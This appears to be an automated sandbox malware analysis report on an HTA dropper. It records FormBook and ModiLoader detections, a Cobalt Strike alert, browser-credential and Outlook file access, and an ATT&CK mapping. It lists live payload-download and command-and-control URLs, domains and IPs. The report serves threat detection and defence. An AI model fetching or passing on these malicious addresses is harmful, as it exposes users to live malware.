                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F38D0C GetLocalTime,6_2_02F38D0C
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F4A94C GetUserNameA,6_2_02F4A94C
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 6_2_02F3B20C GetVersionExA,6_2_02F3B20C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 0000000E.00000002.2110369857.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2107211375.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2110518882.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1202792315.0000000005460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2111063541.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2116062584.0000000005D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1202895783.00000000073A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1223919128.000000002C7F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Windows\SysWOW64\systeminfo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\SysWOW64\systeminfo.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                    Remote Access Functionality

                    barindex
                    Yara detected FormBook
                    Source: Yara matchFile source: 0000000E.00000002.2110369857.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2107211375.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2110518882.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1202792315.0000000005460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2111063541.00000000025B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2116062584.0000000005D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1202895783.00000000073A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.1223919128.000000002C7F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		14
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts11
                    Command and Scripting Interpreter                    		Boot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Abuse Elevation Control Mechanism                    		LSASS Memory1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts3
                    PowerShell                    		Logon Script (Windows)612
                    Process Injection                    		3
                    Obfuscated Files or Information                    		Security Account Manager2
                    File and Directory Discovery                    		SMB/Windows Admin Shares11
                    Email Collection                    		4
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    DLL Side-Loading                    		NTDS138
                    System Information Discovery                    		Distributed Component Object ModelInput Capture14
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                    Masquerading                    		LSA Secrets431
                    Security Software Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials41
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items612
                    Process Injection                    		DCSync3
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1664909 Sample: truelifewithmanmadethingson... Startdate: 14/04/2025 Architecture: WINDOWS Score: 100 67 x112.jieruitech.info 2->67 69 www.zthzzyg.top 2->69 71 8 other IPs or domains 2->71 81 Suricata IDS alerts for network traffic 2->81 83 Multi AV Scanner detection for dropped file 2->83 85 Multi AV Scanner detection for submitted file 2->85 87 7 other signatures 2->87 13 mshta.exe 1 2->13         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 109 Suspicious command line found 13->109 111 PowerShell case anomaly found 13->111 19 cmd.exe 1 13->19         started        65 127.0.0.1 unknown unknown 16->65 signatures6 process7 signatures8 89 Detected Cobalt Strike Beacon 19->89 91 Suspicious powershell command line found 19->91 93 PowerShell case anomaly found 19->93 22 powershell.exe 43 19->22         started        27 conhost.exe 19->27         started        process9 dnsIp10 73 192.3.26.143, 49681, 80 AS-COLOCROSSINGUS United States 22->73 59 C:\Users\user\AppData\Roaming\hkcmd.exe, PE32 22->59 dropped 61 C:\Users\user\AppData\Local\...\hkcmd[1].exe, PE32 22->61 dropped 63 C:\Users\user\AppData\...\4jbortuo.cmdline, Unicode 22->63 dropped 105 Loading BitLocker PowerShell Module 22->105 107 Powershell drops PE file 22->107 29 hkcmd.exe 5 22->29         started        32 csc.exe 3 22->32         started        file11 signatures12 process13 file14 113 Multi AV Scanner detection for dropped file 29->113 115 Writes to foreign memory regions 29->115 117 Allocates memory in foreign processes 29->117 119 4 other signatures 29->119 35 colorcpl.exe 2 29->35         started        38 cmd.exe 1 29->38         started        40 cmd.exe 1 29->40         started        57 C:\Users\user\AppData\Local\...\4jbortuo.dll, PE32 32->57 dropped 42 cvtres.exe 1 32->42         started        signatures15 process16 signatures17 95 Maps a DLL or memory area into another process 35->95 44 jy7dhEfPtuBr.exe 35->44 injected 48 conhost.exe 38->48         started        50 conhost.exe 40->50         started        process18 dnsIp19 75 www.lifway.life 209.74.80.150, 49698, 49699, 49700 MULTIBAND-NEWHOPEUS United States 44->75 77 x112.jieruitech.info 192.197.113.156, 49692, 80 HKKFGL-AS-APHKKwaifongGroupLimitedHK China 44->77 79 3 other IPs or domains 44->79 121 Found direct / indirect Syscall (likely to bypass EDR) 44->121 52 systeminfo.exe 13 44->52         started        signatures20 process21 signatures22 97 Tries to steal Mail credentials (via file / registry access) 52->97 99 Tries to harvest and steal browser information (history, passwords, etc) 52->99 101 Modifies the context of a thread in another process (thread injection) 52->101 103 2 other signatures 52->103 55 firefox.exe 52->55         started        process23

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    truelifewithmanmadethingsonherefor.hta49%VirustotalBrowse
                    truelifewithmanmadethingsonherefor.hta31%ReversingLabsScript-WScript.Trojan.Asthma
                    SAMPLE100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\hkcmd[1].exe72%ReversingLabsWin32.Trojan.ModiLoader
                    C:\Users\user\AppData\Roaming\hkcmd.exe72%ReversingLabsWin32.Trojan.ModiLoader

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.72422.pink/tbxt/?NN=3NLhkz&ix=Iqu27JV6RtB5rwbWGX5phE4n2DLT8oSC71HEWnCl1r6gTdDm+5MFdqapX6KFcoaemzdW+bJMUEQ6mPDpHKBT298xZqQgH4Lfi5qu+/ZqVZvF6XXxTTdWlrU0agt8zu0nuVHx3Ilwud1w0%Avira URL Cloudsafe
                    http://192.3.26.143/440/hkcmd.ex0%Avira URL Cloudsafe
                    http://192.3.26.143/440/hkcmd.exeGQ_80%Avira URL Cloudsafe
                    http://www.lifway.life/bpdk/0%Avira URL Cloudsafe
                    http://192.3.26.143/440/hkcmd.exeVVC:0%Avira URL Cloudsafe
                    http://crl.microsoftE0%Avira URL Cloudsafe
                    http://www.wavekeith.media/c6g4/0%Avira URL Cloudsafe
                    http://192.3.26.143/440/hkcmd.exe0%Avira URL Cloudsafe
                    http://www.shangaccurate.shop/3p3g/0%Avira URL Cloudsafe
                    http://www.lifway.life/bpdk/?ix=Qd+AbDlML76Asp7YEEUMi3jx5MAB0lZePBuu7Alv7PtIyWqe0sOmlfN5AzVKPyVHj8GaIG6tBp5tN59gjWFGxeQciM6shSLelL9WbQzpne3fhS2cyjbY6u5CBjRMOph4h3kRM9WPncft&NN=3NLhkz0%Avira URL Cloudsafe
                    http://www.zthzzyg.top/m2co/?NN=3NLhkz&ix=KkhKztOrouYdO6KpXdVqi4w74F2zq51iuilzw+5EZsUSRbPhfJs15SPe6okTiDbvjrFGHVzshQWoM28L+pgrT7TrEWbDpJgYtRp9N28tSgtD4xDdgHuP4RPfj9LZ7uS6d61btWswAq5C0%Avira URL Cloudsafe
                    http://www.zthzzyg.top/m2co/0%Avira URL Cloudsafe
                    http://www.shangaccurate.shop0%Avira URL Cloudsafe
                    http://www.wavekeith.media/c6g4/?NN=3NLhkz&ix=RNZMSqcedGWBg2TZO3dRh8gxMl4f67yslf8Dfsx/arayUyYyOnUvY1yeRgX28wL25sy8+E+PkSfs0QcIoRMa6+Ep4Tg3cATtExcE90VheDKKwlijFeg9xfpzIDqmnkPc+WGA9QqEzPXj0%Avira URL Cloudsafe
                    http://192.3.26.143/440/hkcmd.exeL0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    x112.jieruitech.info
                    		192.197.113.156
                    		truetrue
                      		unknown
                      www.wavekeith.media
                      		13.248.169.48
                      		truetrue
                        		unknown
                        www.lifway.life
                        		209.74.80.150
                        		truetrue
                          		unknown
                          www.zthzzyg.top
                          		38.181.35.142
                          		truetrue
                            		unknown
                            www.shangaccurate.shop
                            		104.21.85.156
                            		truefalse
                              		high
                              www.72422.pink
                              		unknown
                              		unknownfalse
                                		unknown
                                www.credit-agricole.pics
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.rvtapp.com
                                  		unknown
                                  		unknownfalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.72422.pink/tbxt/?NN=3NLhkz&ix=Iqu27JV6RtB5rwbWGX5phE4n2DLT8oSC71HEWnCl1r6gTdDm+5MFdqapX6KFcoaemzdW+bJMUEQ6mPDpHKBT298xZqQgH4Lfi5qu+/ZqVZvF6XXxTTdWlrU0agt8zu0nuVHx3Ilwud1wtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.shangaccurate.shop/3p3g/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.lifway.life/bpdk/?ix=Qd+AbDlML76Asp7YEEUMi3jx5MAB0lZePBuu7Alv7PtIyWqe0sOmlfN5AzVKPyVHj8GaIG6tBp5tN59gjWFGxeQciM6shSLelL9WbQzpne3fhS2cyjbY6u5CBjRMOph4h3kRM9WPncft&NN=3NLhkztrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://192.3.26.143/440/hkcmd.exetrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.wavekeith.media/c6g4/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.lifway.life/bpdk/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.zthzzyg.top/m2co/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.zthzzyg.top/m2co/?NN=3NLhkz&ix=KkhKztOrouYdO6KpXdVqi4w74F2zq51iuilzw+5EZsUSRbPhfJs15SPe6okTiDbvjrFGHVzshQWoM28L+pgrT7TrEWbDpJgYtRp9N28tSgtD4xDdgHuP4RPfj9LZ7uS6d61btWswAq5Ctrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.wavekeith.media/c6g4/?NN=3NLhkz&ix=RNZMSqcedGWBg2TZO3dRh8gxMl4f67yslf8Dfsx/arayUyYyOnUvY1yeRgX28wL25sy8+E+PkSfs0QcIoRMa6+Ep4Tg3cATtExcE90VheDKKwlijFeg9xfpzIDqmnkPc+WGA9QqEzPXjtrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://pki.eset.com/crt/csca2020.crt05hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/ac/?q=systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://pki.eset.com/csp0hkcmd.exe, 00000006.00000002.1019232194.000000002141B000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000002.1020070268.0000000021550000.00000004.00000020.00020000.00000000.sdmp, hkcmd.exe, 00000006.00000003.969101886.000000007EBB0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000003.00000002.1049144904.0000000006385000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=systeminfo.exe, 0000000E.00000003.1385652228.0000000007EDD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
